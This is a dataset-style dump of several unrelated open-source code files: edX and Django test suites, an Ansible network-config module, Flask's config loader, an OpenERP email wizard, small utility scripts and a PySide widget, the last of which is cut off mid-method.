repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
---|---|---|---|---|
chrisfilda/edx_platform
|
refs/heads/master
|
lms/djangoapps/staticbook/tests.py
|
8
|
"""
Test the lms/staticbook views.
"""
import textwrap
import mock
import requests
from django.test.utils import override_settings
from django.core.urlresolvers import reverse, NoReverseMatch
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from student.tests.factories import UserFactory, CourseEnrollmentFactory
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
IMAGE_BOOK = ("An Image Textbook", "http://example.com/the_book/")
PDF_BOOK = {
"tab_title": "Textbook",
"title": "A PDF Textbook",
"chapters": [
{"title": "Chapter 1 for PDF", "url": "https://somehost.com/the_book/chap1.pdf"},
{"title": "Chapter 2 for PDF", "url": "https://somehost.com/the_book/chap2.pdf"},
],
}
PORTABLE_PDF_BOOK = {
"tab_title": "Textbook",
"title": "A PDF Textbook",
"chapters": [
{"title": "Chapter 1 for PDF", "url": "/static/chap1.pdf"},
{"title": "Chapter 2 for PDF", "url": "/static/chap2.pdf"},
],
}
HTML_BOOK = {
"tab_title": "Textbook",
"title": "An HTML Textbook",
"chapters": [
{"title": "Chapter 1 for HTML", "url": "https://somehost.com/the_book/chap1.html"},
{"title": "Chapter 2 for HTML", "url": "https://somehost.com/the_book/chap2.html"},
],
}
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class StaticBookTest(ModuleStoreTestCase):
"""
Helpers for the static book tests.
"""
def __init__(self, *args, **kwargs):
super(StaticBookTest, self).__init__(*args, **kwargs)
self.course = None
def make_course(self, **kwargs):
"""
Make a course with an enrolled logged-in student.
"""
self.course = CourseFactory.create(**kwargs)
user = UserFactory.create()
CourseEnrollmentFactory.create(user=user, course_id=self.course.id)
self.client.login(username=user.username, password='test')
def make_url(self, url_name, **kwargs):
"""
Make a URL for a `url_name` using keyword args for url slots.
Automatically provides the course id.
"""
kwargs['course_id'] = self.course.id
url = reverse(url_name, kwargs=kwargs)
return url
class StaticImageBookTest(StaticBookTest):
"""
Test the image-based static book view.
"""
def test_book(self):
# We can access a book.
with mock.patch.object(requests, 'get') as mock_get:
mock_get.return_value.text = textwrap.dedent('''\
<?xml version="1.0"?>
<table_of_contents>
<entry page="9" page_label="ix" name="Contents!?"/>
<entry page="1" page_label="i" name="Preamble">
<entry page="4" page_label="iv" name="About the Elephants"/>
</entry>
</table_of_contents>
''')
self.make_course(textbooks=[IMAGE_BOOK])
url = self.make_url('book', book_index=0)
response = self.client.get(url)
self.assertContains(response, "Contents!?")
self.assertContains(response, "About the Elephants")
def test_bad_book_id(self):
# A bad book id will be a 404.
self.make_course(textbooks=[IMAGE_BOOK])
with self.assertRaises(NoReverseMatch):
self.make_url('book', book_index='fooey')
def test_out_of_range_book_id(self):
self.make_course()
url = self.make_url('book', book_index=0)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_bad_page_id(self):
# A bad page id will cause a 404.
self.make_course(textbooks=[IMAGE_BOOK])
with self.assertRaises(NoReverseMatch):
self.make_url('book', book_index=0, page='xyzzy')
class StaticPdfBookTest(StaticBookTest):
"""
Test the PDF static book view.
"""
def test_book(self):
# We can access a book.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0)
response = self.client.get(url)
self.assertContains(response, "Chapter 1 for PDF")
self.assertNotContains(response, "options.chapterNum =")
self.assertNotContains(response, "page=")
def test_book_chapter(self):
# We can access a book at a particular chapter.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, chapter=2)
response = self.client.get(url)
self.assertContains(response, "Chapter 2 for PDF")
self.assertContains(response, "file={}".format(PDF_BOOK['chapters'][1]['url']))
self.assertNotContains(response, "page=")
def test_book_page(self):
# We can access a book at a particular page.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, page=17)
response = self.client.get(url)
self.assertContains(response, "Chapter 1 for PDF")
self.assertNotContains(response, "options.chapterNum =")
self.assertContains(response, "page=17")
def test_book_chapter_page(self):
# We can access a book at a particular chapter and page.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, chapter=2, page=17)
response = self.client.get(url)
self.assertContains(response, "Chapter 2 for PDF")
self.assertContains(response, "file={}".format(PDF_BOOK['chapters'][1]['url']))
self.assertContains(response, "page=17")
def test_bad_book_id(self):
# If the book id isn't an int, we'll get a 404.
self.make_course(pdf_textbooks=[PDF_BOOK])
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index='fooey', chapter=1)
def test_out_of_range_book_id(self):
# If we have one book, asking for the second book will fail with a 404.
self.make_course(pdf_textbooks=[PDF_BOOK])
url = self.make_url('pdf_book', book_index=1, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_no_book(self):
# If we have no books, asking for the first book will fail with a 404.
self.make_course()
url = self.make_url('pdf_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_chapter_xss(self):
# The chapter in the URL used to go right on the page.
self.make_course(pdf_textbooks=[PDF_BOOK])
# It's no longer possible to use a non-integer chapter.
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index=0, chapter='xyzzy')
def test_page_xss(self):
# The page in the URL used to go right on the page.
self.make_course(pdf_textbooks=[PDF_BOOK])
# It's no longer possible to use a non-integer page.
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index=0, page='xyzzy')
def test_chapter_page_xss(self):
# The page in the URL used to go right on the page.
self.make_course(pdf_textbooks=[PDF_BOOK])
# It's no longer possible to use a non-integer page and a non-integer chapter.
with self.assertRaises(NoReverseMatch):
self.make_url('pdf_book', book_index=0, chapter='fooey', page='xyzzy')
def test_static_url_map_contentstore(self):
"""
This ensure static URL mapping is happening properly for
a course that uses the contentstore
"""
self.make_course(pdf_textbooks=[PORTABLE_PDF_BOOK])
url = self.make_url('pdf_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertNotContains(response, 'file={}'.format(PORTABLE_PDF_BOOK['chapters'][0]['url']))
self.assertContains(response, 'file=/c4x/{0.org}/{0.course}/asset/{1}'.format(
self.course.location,
PORTABLE_PDF_BOOK['chapters'][0]['url'].replace('/static/', '')))
def test_static_url_map_static_asset_path(self):
"""
Like above, but used when the course has set a static_asset_path
"""
self.make_course(pdf_textbooks=[PORTABLE_PDF_BOOK], static_asset_path='awesomesauce')
url = self.make_url('pdf_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertNotContains(response, 'file={}'.format(PORTABLE_PDF_BOOK['chapters'][0]['url']))
self.assertNotContains(response, 'file=/c4x/{0.org}/{0.course}/asset/{1}'.format(
self.course.location,
PORTABLE_PDF_BOOK['chapters'][0]['url'].replace('/static/', '')))
self.assertContains(response, 'file=/static/awesomesauce/{}'.format(
PORTABLE_PDF_BOOK['chapters'][0]['url'].replace('/static/', '')))
class StaticHtmlBookTest(StaticBookTest):
"""
Test the HTML static book view.
"""
def test_book(self):
# We can access a book.
self.make_course(html_textbooks=[HTML_BOOK])
url = self.make_url('html_book', book_index=0)
response = self.client.get(url)
self.assertContains(response, "Chapter 1 for HTML")
self.assertNotContains(response, "options.chapterNum =")
def test_book_chapter(self):
# We can access a book at a particular chapter.
self.make_course(html_textbooks=[HTML_BOOK])
url = self.make_url('html_book', book_index=0, chapter=2)
response = self.client.get(url)
self.assertContains(response, "Chapter 2 for HTML")
self.assertContains(response, "options.chapterNum = 2;")
def test_bad_book_id(self):
# If we have one book, asking for the second book will fail with a 404.
self.make_course(html_textbooks=[HTML_BOOK])
url = self.make_url('html_book', book_index=1, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_no_book(self):
# If we have no books, asking for the first book will fail with a 404.
self.make_course()
url = self.make_url('html_book', book_index=0, chapter=1)
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_chapter_xss(self):
# The chapter in the URL used to go right on the page.
self.make_course(pdf_textbooks=[HTML_BOOK])
# It's no longer possible to use a non-integer chapter.
with self.assertRaises(NoReverseMatch):
self.make_url('html_book', book_index=0, chapter='xyzzy')
|
takeflight/django
|
refs/heads/master
|
django/contrib/redirects/tests.py
|
112
|
from django import http
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, modify_settings, override_settings
from django.utils import six
from .middleware import RedirectFallbackMiddleware
from .models import Redirect
@modify_settings(MIDDLEWARE_CLASSES={'append':
'django.contrib.redirects.middleware.RedirectFallbackMiddleware'})
@override_settings(APPEND_SLASH=False, SITE_ID=1)
class RedirectTests(TestCase):
def setUp(self):
self.site = Site.objects.get(pk=settings.SITE_ID)
def test_model(self):
r1 = Redirect.objects.create(
site=self.site, old_path='/initial', new_path='/new_target')
self.assertEqual(six.text_type(r1), "/initial ---> /new_target")
def test_redirect(self):
Redirect.objects.create(
site=self.site, old_path='/initial', new_path='/new_target')
response = self.client.get('/initial')
self.assertRedirects(response,
'/new_target', status_code=301, target_status_code=404)
@override_settings(APPEND_SLASH=True)
def test_redirect_with_append_slash(self):
Redirect.objects.create(
site=self.site, old_path='/initial/', new_path='/new_target/')
response = self.client.get('/initial')
self.assertRedirects(response,
'/new_target/', status_code=301, target_status_code=404)
@override_settings(APPEND_SLASH=True)
def test_redirect_with_append_slash_and_query_string(self):
Redirect.objects.create(
site=self.site, old_path='/initial/?foo', new_path='/new_target/')
response = self.client.get('/initial?foo')
self.assertRedirects(response,
'/new_target/', status_code=301, target_status_code=404)
def test_response_gone(self):
"""When the redirect target is '', return a 410"""
Redirect.objects.create(
site=self.site, old_path='/initial', new_path='')
response = self.client.get('/initial')
self.assertEqual(response.status_code, 410)
@modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'})
def test_sites_not_installed(self):
with self.assertRaises(ImproperlyConfigured):
RedirectFallbackMiddleware()
class OverriddenRedirectFallbackMiddleware(RedirectFallbackMiddleware):
# Use HTTP responses different from the defaults
response_gone_class = http.HttpResponseForbidden
response_redirect_class = http.HttpResponseRedirect
@modify_settings(MIDDLEWARE_CLASSES={'append':
'django.contrib.redirects.tests.OverriddenRedirectFallbackMiddleware'})
@override_settings(SITE_ID=1)
class OverriddenRedirectMiddlewareTests(TestCase):
def setUp(self):
self.site = Site.objects.get(pk=settings.SITE_ID)
def test_response_gone_class(self):
Redirect.objects.create(
site=self.site, old_path='/initial/', new_path='')
response = self.client.get('/initial/')
self.assertEqual(response.status_code, 403)
def test_response_redirect_class(self):
Redirect.objects.create(
site=self.site, old_path='/initial/', new_path='/new_target/')
response = self.client.get('/initial/')
self.assertEqual(response.status_code, 302)
|
tedelhourani/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/cloudengine/ce_config.py
|
27
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_config
version_added: "2.4"
author: "QijunPan (@CloudEngine-Ansible)"
short_description: Manage Huawei CloudEngine configuration sections.
description:
- Huawei CloudEngine configurations use a simple block indent file syntax
for segmenting configuration into sections. This module provides
an implementation for working with CloudEngine configuration sections in
a deterministic way. This module works with CLI transports.
options:
lines:
description:
- The ordered set of commands that should be configured in the
section. The commands must be the exact same commands as found
in the device current-configuration. Be sure to note the configuration
command syntax as some commands are automatically modified by the
device config parser.
required: false
default: null
parents:
description:
- The ordered set of parents that uniquely identify the section
the commands should be checked against. If the parents argument
is omitted, the commands are checked against the set of top
level or global commands.
required: false
default: null
src:
description:
- The I(src) argument provides a path to the configuration file
to load into the remote system. The path can either be a full
system path to the configuration file if the value starts with /
or relative to the root of the implemented role or playbook.
This argument is mutually exclusive with the I(lines) and
I(parents) arguments.
required: false
default: null
before:
description:
- The ordered set of commands to push on to the command stack if
a change needs to be made. This allows the playbook designer
the opportunity to perform configuration commands prior to pushing
any changes without affecting how the set of commands are matched
against the system.
required: false
default: null
after:
description:
- The ordered set of commands to append to the end of the command
stack if a change needs to be made. Just like with I(before) this
allows the playbook designer to append a set of commands to be
executed after the command set.
required: false
default: null
match:
description:
- Instructs the module on the way to perform the matching of
the set of commands against the current device config. If
match is set to I(line), commands are matched line by line. If
match is set to I(strict), command lines are matched with respect
to position. If match is set to I(exact), command lines
must be an equal match. Finally, if match is set to I(none), the
module will not attempt to compare the source configuration with
the current-configuration on the remote device.
required: false
default: line
choices: ['line', 'strict', 'exact', 'none']
replace:
description:
- Instructs the module on the way to perform the configuration
on the device. If the replace argument is set to I(line) then
the modified lines are pushed to the device in configuration
mode. If the replace argument is set to I(block) then the entire
command block is pushed to the device in configuration mode if any
line is not correct.
required: false
default: line
choices: ['line', 'block']
backup:
description:
- This argument will cause the module to create a full backup of
the current C(current-configuration) from the remote device before any
changes are made. The backup file is written to the C(backup)
folder in the playbook root directory. If the directory does not
exist, it is created.
required: false
type: bool
default: false
config:
description:
- The module, by default, will connect to the remote device and
retrieve the current current-configuration to use as a base for comparing
against the contents of source. There are times when it is not
desirable to have the task get the current-configuration for
every task in a playbook. The I(config) argument allows the
implementer to pass in the configuration to use as the base
config for comparison.
required: false
default: null
defaults:
description:
- The I(defaults) argument will influence how the current-configuration
is collected from the device. When the value is set to true,
the command used to collect the current-configuration is append with
the all keyword. When the value is set to false, the command
is issued without the all keyword.
required: false
type: bool
default: false
save:
description:
- The C(save) argument instructs the module to save the
current-configuration to saved-configuration. This operation is performed
after any changes are made to the current running config. If
no changes are made, the configuration is still saved to the
startup config. This option will always cause the module to
return changed.
required: false
type: bool
default: false
"""
EXAMPLES = """
# Note: examples below use the following provider dict to handle
# transport and authentication to the node.
- name: CloudEngine config test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Configure top level configuration and save it"
ce_config:
lines: sysname {{ inventory_hostname }}
save: yes
provider: "{{ cli }}"
- name: "Configure acl configuration and save it"
ce_config:
lines:
- rule 10 permit source 1.1.1.1 32
- rule 20 permit source 2.2.2.2 32
- rule 30 permit source 3.3.3.3 32
- rule 40 permit source 4.4.4.4 32
- rule 50 permit source 5.5.5.5 32
parents: acl 2000
before: undo acl 2000
match: exact
provider: "{{ cli }}"
- name: "Configure acl configuration and save it"
ce_config:
lines:
- rule 10 permit source 1.1.1.1 32
- rule 20 permit source 2.2.2.2 32
- rule 30 permit source 3.3.3.3 32
- rule 40 permit source 4.4.4.4 32
parents: acl 2000
before: undo acl 2000
replace: block
provider: "{{ cli }}"
"""
RETURN = """
updates:
description: The set of commands that will be pushed to the remote device
returned: Only when lines is specified.
type: list
sample: ['...', '...']
backup_path:
description: The full path to the backup file
returned: when backup is yes
type: string
sample: /playbooks/ansible/backup/ce_config.2016-07-16@22:28:34
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netcfg import NetworkConfig, dumps
from ansible.module_utils.ce import get_config, load_config, run_commands
from ansible.module_utils.ce import ce_argument_spec
from ansible.module_utils.ce import check_args as ce_check_args
def check_args(module, warnings):
ce_check_args(module, warnings)
def get_running_config(module):
contents = module.params['config']
if not contents:
flags = []
if module.params['defaults']:
flags.append('include-default')
contents = get_config(module, flags=flags)
return NetworkConfig(indent=1, contents=contents)
def get_candidate(module):
candidate = NetworkConfig(indent=1)
if module.params['src']:
candidate.load(module.params['src'])
elif module.params['lines']:
parents = module.params['parents'] or list()
candidate.add(module.params['lines'], parents=parents)
return candidate
def run(module, result):
match = module.params['match']
replace = module.params['replace']
candidate = get_candidate(module)
if match != 'none':
config = get_running_config(module)
path = module.params['parents']
configobjs = candidate.difference(config, match=match, replace=replace, path=path)
else:
configobjs = candidate.items
if configobjs:
commands = dumps(configobjs, 'commands').split('\n')
if module.params['lines']:
if module.params['before']:
commands[:0] = module.params['before']
if module.params['after']:
commands.extend(module.params['after'])
result['commands'] = commands
result['updates'] = commands
if not module.check_mode:
load_config(module, commands)
result['changed'] = True
def main():
""" main entry point for module execution
"""
argument_spec = dict(
src=dict(type='path'),
lines=dict(aliases=['commands'], type='list'),
parents=dict(type='list'),
before=dict(type='list'),
after=dict(type='list'),
match=dict(default='line', choices=['line', 'strict', 'exact', 'none']),
replace=dict(default='line', choices=['line', 'block']),
config=dict(),
defaults=dict(type='bool', default=False),
backup=dict(type='bool', default=False),
save=dict(type='bool', default=False),
)
argument_spec.update(ce_argument_spec)
mutually_exclusive = [('lines', 'src')]
required_if = [('match', 'strict', ['lines']),
('match', 'exact', ['lines']),
('replace', 'block', ['lines'])]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
required_if=required_if,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = dict(changed=False, warnings=warnings)
if module.params['backup']:
result['__backup__'] = get_config(module)
if any((module.params['src'], module.params['lines'])):
run(module, result)
if module.params['save']:
if not module.check_mode:
run_commands(module, ['save'])
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
ademilly/waterflow
|
refs/heads/master
|
waterflow/__init__.py
|
1
|
"""dataflow package provides a framework to build data analysis pipeline
class:
Flow -- main class for the dataflow package ;
provides functionnal tools to transform a dataset
and do machine learning with it
"""
from flow import Flow
from ml import ML
from source import Source
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
__all__ = [Flow, ML, Source]
|
jmcarbo/openerp8-addons
|
refs/heads/master
|
project_scrum/wizard/project_scrum_email.py
|
5
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
from datetime import datetime
from openerp import tools
class project_scrum_email(osv.osv_memory):
_name = 'project.scrum.email'
def default_get(self, cr, uid, fields, context=None):
"""
This function gets default values
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param fields: List of fields for default value
@param context: A standard dictionary for contextual values
@return : default values of fields.
"""
if context is None:
context = {}
meeting_pool = self.pool.get('project.scrum.meeting')
record_ids = context and context.get('active_ids', []) or []
res = super(project_scrum_email, self).default_get(cr, uid, fields, context=context)
for meeting in meeting_pool.browse(cr, uid, record_ids, context=context):
sprint = meeting.sprint_id
if 'scrum_master_email' in fields:
res.update({'scrum_master_email': sprint.scrum_master_id and sprint.scrum_master_id.user_email or False})
if 'product_owner_email' in fields:
res.update({'product_owner_email': sprint.product_owner_id and sprint.product_owner_id.user_email or False})
if 'subject' in fields:
subject = _("Scrum Meeting : %s") %(meeting.date)
res.update({'subject': subject})
if 'message' in fields:
message = _("Hello , \nI am sending you Scrum Meeting : %s for the Sprint '%s' of Project '%s' ") %(meeting.date, sprint.name, sprint.project_id)
#message = _("Hello , \nI am sending you Scrum Meeting")
res.update({'message': message})
return res
_columns = {
'scrum_master_email': fields.char('Scrum Master Email', size=64, help="Email Id of Scrum Master"),
'product_owner_email': fields.char('Product Owner Email', size=64, help="Email Id of Product Owner"),
'subject':fields.char('Subject', size=64),
'message':fields.text('Message'),
}
def button_send_scrum_email(self, cr, uid, ids, context=None):
if context is None:
context = {}
active_id = context.get('active_id', False)
scrum_meeting_pool = self.pool.get('project.scrum.meeting')
user_pool = self.pool.get('res.users')
meeting = scrum_meeting_pool.browse(cr, uid, active_id, context=context)
# wizard data
data_id = ids and ids[0] or False
if not data_id or not active_id:
return False
data = self.browse(cr, uid, data_id, context=context)
email_from = tools.config.get('email_from', False)
user = user_pool.browse(cr, uid, uid, context=context)
#BUG in v7 address_id does not exit, today its alias_id but we don't find address in the db
user_email = email_from or user.alias_id.email
body = "%s\n" %(data.message)
body += "\n%s\n" %_('Tasks since yesterday')
body += "_______________________\n"
body += "\n%s\n" %(meeting.question_yesterday or _('None'))
body += "\n%s\n" %_("Task for Today")
body += "_______________________ \n"
body += "\n%s\n" %(meeting.question_today or _('None'))
body += "\n%s\n" % _('Blocking points encountered:')
body += "_______________________ \n"
body += "\n%s\n" %(meeting.question_blocks or _('None'))
body += "\n%s\n%s" %(_('Thank you,'), user.name)
if user.signature:
body += "\n%s" %(user.signature)
if data.scrum_master_email == data.product_owner_email:
data.product_owner_email = False
if data.scrum_master_email:
tools.email_send(user_email, [data.scrum_master_email], data.subject, body, reply_to=user_email)
if data.product_owner_email:
tools.email_send(user_email, [data.product_owner_email], data.subject, body, reply_to=user_email)
return {'type': 'ir.actions.act_window_close'}
project_scrum_email()
|
slisson/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyArgumentListInspection/dictFromKeys.py
|
52
|
print(dict.fromkeys(<warning descr="Parameter 'seq' unfilled">)</warning>)
print(dict.fromkeys(['foo', 'bar']))
|
fahrrad/pythonchallenge
|
refs/heads/master
|
2.py
|
1
|
from_a = 'abcdefghijklmnopqrstuvwxyz'
to_a ='cdefghijklmnopqrstuvwxyzab'
s = """g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj."""
d = str.maketrans(from_a, to_a)
print (str.translate(s,d))
print (str.translate('map', d))
|
apocalypsebg/odoo
|
refs/heads/8.0
|
addons/l10n_ar/__openerp__.py
|
260
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Cubic ERP - Teradata SAC (<http://cubicerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Argentina Localization Chart Account',
'version': '1.0',
'description': """
Argentinian accounting chart and tax localization.
==================================================
Plan contable argentino e impuestos de acuerdo a disposiciones vigentes
""",
'author': ['Cubic ERP'],
'website': 'http://cubicERP.com',
'category': 'Localization/Account Charts',
'depends': ['account_chart'],
'data':[
'account_tax_code.xml',
'l10n_ar_chart.xml',
'account_tax.xml',
'l10n_ar_wizard.xml',
],
'demo': [],
'active': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
georgeriz/myFlaskBackend
|
refs/heads/master
|
lib/flask/config.py
|
781
|
# -*- coding: utf-8 -*-
"""
flask.config
~~~~~~~~~~~~
Implements the configuration related objects.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import imp
import os
import errno
from werkzeug.utils import import_string
from ._compat import string_types
class ConfigAttribute(object):
"""Makes an attribute forward to the config"""
def __init__(self, name, get_converter=None):
self.__name__ = name
self.get_converter = get_converter
def __get__(self, obj, type=None):
if obj is None:
return self
rv = obj.config[self.__name__]
if self.get_converter is not None:
rv = self.get_converter(rv)
return rv
def __set__(self, obj, value):
obj.config[self.__name__] = value
class Config(dict):
"""Works exactly like a dict but provides ways to fill it from files
or special dictionaries. There are two common patterns to populate the
config.
Either you can fill the config from a config file::
app.config.from_pyfile('yourconfig.cfg')
Or alternatively you can define the configuration options in the
module that calls :meth:`from_object` or provide an import path to
a module that should be loaded. It is also possible to tell it to
use the same module and with that provide the configuration values
just before the call::
DEBUG = True
SECRET_KEY = 'development key'
app.config.from_object(__name__)
In both cases (loading from any Python file or loading from modules),
only uppercase keys are added to the config. This makes it possible to use
lowercase values in the config file for temporary values that are not added
to the config or to define the config keys in the same file that implements
the application.
Probably the most interesting way to load configurations is from an
environment variable pointing to a file::
app.config.from_envvar('YOURAPPLICATION_SETTINGS')
In this case before launching the application you have to set this
environment variable to the file you want to use. On Linux and OS X
use the export statement::
export YOURAPPLICATION_SETTINGS='/path/to/config/file'
On windows use `set` instead.
:param root_path: path to which files are read relative from. When the
config object is created by the application, this is
the application's :attr:`~flask.Flask.root_path`.
:param defaults: an optional dictionary of default values
"""
def __init__(self, root_path, defaults=None):
dict.__init__(self, defaults or {})
self.root_path = root_path
def from_envvar(self, variable_name, silent=False):
"""Loads a configuration from an environment variable pointing to
a configuration file. This is basically just a shortcut with nicer
error messages for this line of code::
app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS'])
:param variable_name: name of the environment variable
:param silent: set to `True` if you want silent failure for missing
files.
:return: bool. `True` if able to load config, `False` otherwise.
"""
rv = os.environ.get(variable_name)
if not rv:
if silent:
return False
raise RuntimeError('The environment variable %r is not set '
'and as such configuration could not be '
'loaded. Set this variable and make it '
'point to a configuration file' %
variable_name)
return self.from_pyfile(rv, silent=silent)
def from_pyfile(self, filename, silent=False):
"""Updates the values in the config from a Python file. This function
behaves as if the file was imported as module with the
:meth:`from_object` function.
:param filename: the filename of the config. This can either be an
absolute filename or a filename relative to the
root path.
:param silent: set to `True` if you want silent failure for missing
files.
.. versionadded:: 0.7
`silent` parameter.
"""
filename = os.path.join(self.root_path, filename)
d = imp.new_module('config')
d.__file__ = filename
try:
with open(filename) as config_file:
exec(compile(config_file.read(), filename, 'exec'), d.__dict__)
except IOError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR):
return False
e.strerror = 'Unable to load configuration file (%s)' % e.strerror
raise
self.from_object(d)
return True
def from_object(self, obj):
"""Updates the values from the given object. An object can be of one
of the following two types:
- a string: in this case the object with that name will be imported
- an actual object reference: that object is used directly
Objects are usually either modules or classes.
Just the uppercase variables in that object are stored in the config.
Example usage::
app.config.from_object('yourapplication.default_config')
from yourapplication import default_config
app.config.from_object(default_config)
You should not use this function to load the actual configuration but
rather configuration defaults. The actual config should be loaded
with :meth:`from_pyfile` and ideally from a location not within the
package because the package might be installed system wide.
:param obj: an import name or object
"""
if isinstance(obj, string_types):
obj = import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, dict.__repr__(self))
|
clejeu03/EWP
|
refs/heads/master
|
view/sketchViewModule/SketchBoardView.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from PySide import QtGui, QtCore
from view.sketchViewModule.Track import Track
from view.sketchViewModule.SketchList import SketchList
class SketchBoardView (QtGui.QWidget):
def __init__(self, app, sessionView):
super(SketchBoardView, self).__init__()
self._app = app
self._model = app.getSession().currentProject()
self._sessionView = sessionView
self.setAcceptDrops(True)
self._toolbar = None
self._trackList = None
self._stackedWidget = None
self._videoTrackTable = {}
# /!\ Note : self._videoTrackTable stands for a dict where the keys are the widget contained in QListWidgetItem and the values
# are the video that were used for the widget creation. Why ? Because each widget is unique whereas a video can be found multiple
# times in the container. So as in Python dict contain unique key, THE WIDGETS ARE THE KEYS
self.init()
def init(self):
""" Initialize the widget """
#Init the toolbar
self._toolbar = self.initToolbar()
#Init the main widget : the list
self._trackList = SketchList()
#Setting up the layout
layout = QtGui.QVBoxLayout()
self._stackedWidget = QtGui.QStackedWidget()
self._stackedWidget.addWidget(self.createEmptyProjectWidget())
self._stackedWidget.addWidget(self._trackList)
layout.addWidget(self._toolbar)
layout.addWidget(self._stackedWidget)
self.setLayout(layout)
#Display tracks if there are, or the empty widget
self.update()
def initToolbar(self):
"""
Creates the toolbar and the actions that goes in it, in addition make the necessary connection
:return type: QToolbar
"""
toolbar = QtGui.QToolBar()
#TODO : manage the enable/desable of the actions
#Actions
self.addVideoAction = QtGui.QAction(self.tr("&Add Video"), self)
self.addVideoAction.setStatusTip(self.tr("Add a video to the sketch board"))
#self.addVideoAction.setDisabled()
self.connect(self.addVideoAction, QtCore.SIGNAL("triggered()"), self, QtCore.SLOT("addVideo()"))
self.suppressVideoAction = QtGui.QAction(self.tr("&Remove Video"), self)
self.suppressVideoAction.setStatusTip(self.tr("Remove the selected video from the sketch board"))
#self.suppressVideoAction.setDisabled()
self.connect(self.suppressVideoAction, QtCore.SIGNAL("triggered()"), self, QtCore.SLOT("suppressVideo()"))
toolbar.addAction(self.addVideoAction)
toolbar.addAction(self.suppressVideoAction)
return toolbar
def createEmptyProjectWidget(self):
""" Creates a widget just for displaying instructions and help for the user in case the model data are empty """
widget = QtGui.QWidget()
layout = QtGui.QVBoxLayout()
label = QtGui.QLabel("Drag and drop a video from your project in here to add it ! ")
layout.addWidget(label)
widget.setLayout(layout)
return widget
def newTrack(self, video):
"""
